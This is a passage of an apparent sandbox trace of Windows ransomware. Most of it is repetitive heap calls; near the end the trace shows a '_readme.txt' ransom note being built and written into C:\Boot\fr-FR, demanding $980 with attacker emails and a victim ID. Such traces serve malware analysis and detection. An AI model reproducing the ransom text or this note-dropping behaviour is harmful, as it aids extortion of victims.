dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.764] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0142.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.764] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.764] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.764] PathFindFileNameW (pszPath="") returned="" [0142.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.764] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.764] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.764] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.765] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.765] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0142.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.765] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0142.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.766] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.766] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.766] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on 